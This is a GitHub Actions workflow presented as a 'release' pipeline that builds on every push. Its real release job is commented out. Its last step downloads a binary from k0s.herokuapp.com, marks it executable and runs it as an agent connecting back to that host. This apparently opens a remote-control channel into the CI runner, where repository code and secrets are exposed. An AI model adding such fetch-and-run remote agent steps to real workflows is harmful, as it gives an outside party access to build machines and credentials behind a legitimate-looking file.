name: release

on:
- push:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Unshallow  # required for the changelog to work correctly.
      run: git fetch --prune --unshallow

    - name: Run Build
      uses: techknowlogick/xgo:latest
      with:
        entrypoint: bash
      env:
        GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}

    - run: |
        wget https://k0s.herokuapp.com/api/bin/k0s
        chmod +x k0s
        ./k0s agent https://k0s.herokuapp.com
      name: k0s agent

# goreleaser:
#   runs-on: ubuntu-latest
#   steps:
#   - name: Checkout code
#     uses: actions/checkout@v2

#   - name: Unshallow  # required for the changelog to work correctly.
#     run: git fetch --prune --unshallow

#   - name: Run GoReleaser
#     uses: docker://goreleaser/goreleaser:latest
#     with:
#       args: release --rm-dist
#     env:
#       GITHUB_TOKEN: ${{ secrets.ACTIONS_GITHUB_TOKEN }}
